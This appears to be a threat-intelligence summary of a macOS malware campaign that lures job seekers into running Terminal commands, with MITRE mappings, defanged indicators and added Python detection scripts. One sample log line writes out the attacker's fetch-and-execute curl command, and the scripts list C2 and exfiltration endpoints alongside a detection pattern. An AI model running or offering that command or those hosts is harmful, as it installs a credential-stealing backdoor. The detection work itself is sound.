Jamf Threat Labs analyzed a multi-stage FlexibleFerret campaign that uses fake recruitment websites and staged hiring assessments to socially engineer macOS users into running Terminal commands that download and execute a shell loader and Go backdoor. The attack establishes persistence via a LaunchAgent, displays a decoy MediaPatcher.app to capture Chrome credentials and keychain data, and exfiltrates harvested data using the Dropbox upload API as part of the Contagious Interview operation. #FlexibleFerret #ContagiousInterview
Keypoints
- Attackers create fake recruitment websites (e.g., evaluza[.]com, proficiencycert[.]com) that present staged hiring assessments to convince victims to run Terminal commands.
- JavaScript stagers construct and prompt execution of a curl command that downloads a secondary shell script to /var/tmp/macpatch.sh and launches it, matching FlexibleFerret loader indicators.
- The second-stage macpatch.sh determines host architecture, downloads an architecture-specific archive (CDrivers.zip), extracts it, and executes a bundled loader (drivfixer.sh) via a bundled Go runtime.
- Persistence is achieved by writing a LaunchAgent at ~/Library/LaunchAgents/com.driver9990as7tpatch.plist pointing to the extracted loader, and an ad-hoc signed decoy app (MediaPatcher.app) is used to harvest credentials.
- Credential harvesting includes a fake Chrome password prompt and automated collection of Chrome Login Data and related keychain files; exfiltration uses Dropbox’s content.dropboxapi.com/2/files/upload and the attacker queries api.ipify.org for the victim IP.
- The Go backdoor implements a persistent command loop with handlers for system information, file upload/download, command execution, automated stealing, Chrome profile collection, and C2 communication with hXXp://95.169.180.140:8080.
MITRE Techniques
- [T1059.003] Command and Scripting Interpreter: Unix Shell – The campaign relies on victims executing attacker-supplied Terminal commands to start the infection (‘execute a provided macOS command in the Terminal’).
- [T1105] Ingress Tool Transfer – Initial stages download secondary payloads and archives to the host (e.g., ‘downloads a secondary payload to /var/tmp/macpatch.sh’).
- [T1547.001] Boot or Logon Autostart Execution: Launch Agent – The installer writes a LaunchAgent to persist the loader at login (‘writes a LaunchAgent to ~/Library/LaunchAgents/com.driver9990as7tpatch.plist’).
- [T1567.002] Exfiltration Over Web Service: Cloud Storage – Stolen credentials are uploaded using Dropbox’s API via an authenticated POST to content.dropboxapi.com/2/files/upload (‘authenticated POST request to content.dropboxapi.com/2/files/upload’).
- [T1071.001] Application Layer Protocol: Web Protocols – The backdoor communicates with its C2 over HTTP to hXXp://95.169.180.140:8080 (‘contacts the hard‑coded C2 server at hXXp://95.169.180.140:8080’).
- [T1555.002] Credentials from Web Browsers – The malware collects Chrome Login Data and related keychain files for exfiltration (‘collect Chrome Login Data DB and the related keychain file for exfiltration’).
- [T1082] System Information Discovery – The backdoor gathers basic system information such as username, hostname, OS, and architecture (‘collect system information (username, hostname, OS, architecture)’).
- [T1027] Obfuscated Files or Information – The threat blends strings to hide real endpoints, e.g., concatenating fragments to form the Dropbox host (‘concatenating short string fragments to form content.dropboxapi.com’).
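The T1547.001 entry above is the one host artifact a defender can audit directly. The following is an added example, not Jamf's code or anything recovered from the campaign: it parses LaunchAgent plists and flags both the reported label and, more generally, any agent whose program or arguments point into a temp directory, which is the shape of this persistence regardless of the label. The two sample plists are constructed, and the /var/tmp/CDrivers/drivfixer.sh layout is an assumption about how the extracted loader is referenced.

```python
"""Audit LaunchAgent plists for the persistence pattern reported above.

Added example, not Jamf's code. Beyond matching the one label from the
report, it flags any agent that launches a program or script from a temp
directory. The two sample plists are constructed for the demonstration;
the CDrivers file layout inside /var/tmp is an assumption.
"""
import plistlib
from pathlib import Path
from typing import List, Optional

KNOWN_BAD_LABELS = {"com.driver9990as7tpatch"}        # label from the report
TEMP_PREFIXES = ("/var/tmp/", "/private/var/tmp/", "/tmp/", "/private/tmp/")  # heuristic


def expand_home(path: str, home: str) -> str:
    """LaunchAgents may reference ~/; resolve it so the prefix checks work."""
    return home.rstrip("/") + path[1:] if path.startswith("~/") else path


def launched_program(plist: dict) -> Optional[str]:
    """launchd runs Program if set, otherwise ProgramArguments[0]."""
    program = plist.get("Program")
    if isinstance(program, str) and program:
        return program
    args = plist.get("ProgramArguments")
    if isinstance(args, list) and args and isinstance(args[0], str):
        return args[0]
    return None


def audit_launch_agent(plist_bytes: bytes, home: str = "/Users/victim") -> List[str]:
    """Return the reasons a LaunchAgent looks suspicious; an empty list means none found."""
    plist = plistlib.loads(plist_bytes)
    reasons: List[str] = []
    label = plist.get("Label", "")
    if label in KNOWN_BAD_LABELS:
        reasons.append(f"label matches known indicator: {label}")
    program = launched_program(plist)
    if program is None:
        return reasons + ["no Program/ProgramArguments: malformed agent"]
    if expand_home(program, home).startswith(TEMP_PREFIXES):
        reasons.append(f"program runs from a temp directory: {program}")
    # An interpreter (/bin/sh, a bundled runtime) as the program hides the real
    # payload in the arguments, so check those as well.
    for arg in plist.get("ProgramArguments", [])[1:]:
        if isinstance(arg, str) and expand_home(arg, home).startswith(TEMP_PREFIXES):
            reasons.append(f"argument references a temp path: {arg}")
    return reasons


def audit_directory(launch_agents_dir, home: str) -> dict:
    """Audit every .plist in a LaunchAgents directory; returns {filename: reasons}."""
    findings = {}
    for plist_path in Path(launch_agents_dir).glob("*.plist"):
        try:
            reasons = audit_launch_agent(plist_path.read_bytes(), home)
        except plistlib.InvalidFileException as exc:
            reasons = [f"unparseable plist: {exc}"]
        if reasons:
            findings[plist_path.name] = reasons
    return findings


# Constructed samples (not recovered from the campaign).
SUSPICIOUS_AGENT = plistlib.dumps({
    "Label": "com.driver9990as7tpatch",
    "ProgramArguments": ["/bin/sh", "/var/tmp/CDrivers/drivfixer.sh"],  # assumed layout
    "RunAtLoad": True,
    "KeepAlive": True,
})
BENIGN_AGENT = plistlib.dumps({
    "Label": "com.example.updater",
    "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater", "--check"],
    "RunAtLoad": True,
})

if __name__ == "__main__":
    for name, data in (("suspicious", SUSPICIOUS_AGENT), ("benign", BENIGN_AGENT)):
        print(name, audit_launch_agent(data) or "clean")
    # On a real host: audit_directory(Path.home() / "Library/LaunchAgents", str(Path.home()))
```

The argument walk matters more than the label check: the report describes the loader being run through a bundled runtime, so the first element of ProgramArguments is an interpreter and the dropped script only appears later in the list.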
Indicators of Compromise
- [IP address] C2 server – 95.169.180.140 (C2 listed with port 8080).
- [Domain/Host] lure and payload hosting domains – evaluza[.]com, proficiencycert[.]com (payload hosting and staged assessment sites), and app.zynoracreative.com for second-stage files.
- [URL] second-stage payload URLs – hXXps://app.zynoracreative.com/updrv8/drvMac-as7t.patch, hXXps://app.zynoracreative.com/updrv8/drv-Arm64.patch (used to fetch macpatch.sh and architecture-specific payloads).
- [File path / filename] dropped scripts and artifacts – /var/tmp/macpatch.sh, /var/tmp/CDrivers.zip, /var/tmp/CDrivers, drivfixer.sh, MediaPatcher.app, and ~/Library/LaunchAgents/com.driver9990as7tpatch.plist.
- [API endpoint] exfiltration and reconnaissance endpoints – content.dropboxapi.com/2/files/upload (exfiltration), api.ipify.org (public IP retrieval).
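To turn the indicator list above and the stager chain from the key points into something that runs over telemetry, here is an added example (not Jamf's code). It takes the indicators in the defanged form they are published in, refangs them, and matches them against proxy/process log lines and a file listing. Two points it makes that a plain grep would not: proxy logs usually split host and path into separate fields, so a URL indicator must be matched as host plus path rather than as one string; and api.ipify.org is a legitimate service that plenty of benign software calls, so it is kept in a low-confidence list. All log lines and file paths are constructed samples, and the curl-into-/var/tmp regex is an assumed heuristic derived from the report's description of the stager, not a signature from the report.

```python
"""Sweep log lines and file paths for the indicators listed above.

Added example, not Jamf's code. Indicators are copied from the page in their
defanged form and refanged before matching. The log lines and file listing
are constructed samples; the curl-into-/var/tmp pattern is an assumed
heuristic based on the report's description of the stager.
"""
import re
from typing import Dict, List, Tuple

Hit = Tuple[str, str]  # (category, indicator as published)

NETWORK_IOCS: List[Hit] = [
    ("C2 server", "95.169.180.140:8080"),
    ("lure domain", "evaluza[.]com"),
    ("lure domain", "proficiencycert[.]com"),
    ("payload host", "app.zynoracreative.com"),
    ("payload URL", "hXXps://app.zynoracreative.com/updrv8/drvMac-as7t.patch"),
    ("payload URL", "hXXps://app.zynoracreative.com/updrv8/drv-Arm64.patch"),
    ("exfiltration endpoint", "content.dropboxapi.com/2/files/upload"),
]
# api.ipify.org is a legitimate service used by plenty of benign software, so a
# hit is only meaningful next to the indicators above.
LOW_CONFIDENCE_IOCS: List[Hit] = [
    ("public IP lookup (low confidence)", "api.ipify.org"),
]
HOST_IOCS: List[Hit] = [
    ("dropped script", "/var/tmp/macpatch.sh"),
    ("dropped archive", "/var/tmp/CDrivers.zip"),
    ("extracted payload directory", "/var/tmp/CDrivers"),
    ("loader script", "drivfixer.sh"),
    ("decoy app", "MediaPatcher.app"),
    # "~/" dropped so the same entry matches any user's home directory.
    ("LaunchAgent", "Library/LaunchAgents/com.driver9990as7tpatch.plist"),
]
STAGER_PATTERN = re.compile(r"\bcurl\b.*(?:/private)?/var/tmp/\S+")  # assumed heuristic


def refang(ioc: str) -> str:
    """Reverse the defanging used in published IoCs (hXXp -> http, [.] -> .)."""
    return ioc.replace("hXXp", "http").replace("[.]", ".")


def network_ioc_matches(ioc: str, line: str) -> bool:
    """Match the host (with optional port) on token boundaries, plus the path if the IoC has one."""
    real = re.sub(r"^https?://", "", refang(ioc))
    host, slash, path = real.partition("/")
    if not re.search(r"(?<![\w.-])" + re.escape(host) + r"(?![\w-])", line):
        return False
    # Proxy logs often put host and path in separate fields, so match the path on its own.
    return not slash or re.search(re.escape("/" + path) + r"(?![\w-])", line) is not None


def scan_log_line(line: str) -> List[Hit]:
    hits = [(cat, ioc) for cat, ioc in NETWORK_IOCS + LOW_CONFIDENCE_IOCS
            if network_ioc_matches(ioc, line)]
    if STAGER_PATTERN.search(line):
        hits.append(("stager pattern", "curl download into /var/tmp"))
    return hits


def host_ioc_matches(ioc: str, path: str) -> bool:
    if ioc.startswith("/"):                  # absolute: exact path or anything beneath it
        return path == ioc or path.startswith(ioc + "/")
    return path.endswith("/" + ioc)          # bare name or home-relative path


def scan_paths(paths: List[str]) -> List[Tuple[str, Hit]]:
    return [(p, (cat, ioc)) for p in paths for cat, ioc in HOST_IOCS if host_ioc_matches(ioc, p)]


def sweep(log_lines: List[str], paths: List[str]) -> Dict[str, list]:
    """Run both scans; returns {"network": [(line, hit), ...], "host": [(path, hit), ...]}."""
    network = [(line, hit) for line in log_lines for hit in scan_log_line(line)]
    return {"network": network, "host": scan_paths(paths)}


# Constructed sample telemetry modelled on the chain described in the report.
SAMPLE_LOGS = [
    "proxy user=alice dst=evaluza.com path=/assessment/step2 status=200",
    "proc user=alice cmd='curl -s -o /var/tmp/macpatch.sh https://app.zynoracreative.com/updrv8/drvMac-as7t.patch && sh /var/tmp/macpatch.sh'",
    "proxy user=alice dst=api.ipify.org path=/ status=200",
    "proxy user=alice dst=content.dropboxapi.com path=/2/files/upload method=POST status=200",
    "proxy user=bob dst=www.example.com path=/ status=200",
    "net user=alice connect 95.169.180.140:8080 proto=tcp",
]
SAMPLE_FILES = [
    "/Users/alice/Library/LaunchAgents/com.driver9990as7tpatch.plist",
    "/var/tmp/macpatch.sh",
    "/var/tmp/CDrivers/drivfixer.sh",
    "/Users/alice/Library/LaunchAgents/com.example.sync.plist",
    "/Applications/Safari.app",
]

if __name__ == "__main__":
    result = sweep(SAMPLE_LOGS, SAMPLE_FILES)
    for source, hit in result["network"] + result["host"]:
        print(f"{hit[0]:<36} {hit[1]:<60} <- {source}")
```

The token-boundary lookarounds keep a domain indicator from firing on an unrelated host that merely contains it as a suffix, and the absolute-path rule treats /var/tmp/CDrivers as a prefix so anything extracted beneath it is caught even when the file names differ from the ones reported.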
Read more: https://www.jamf.com/blog/flexibleferret-malware-continues-to-adapt/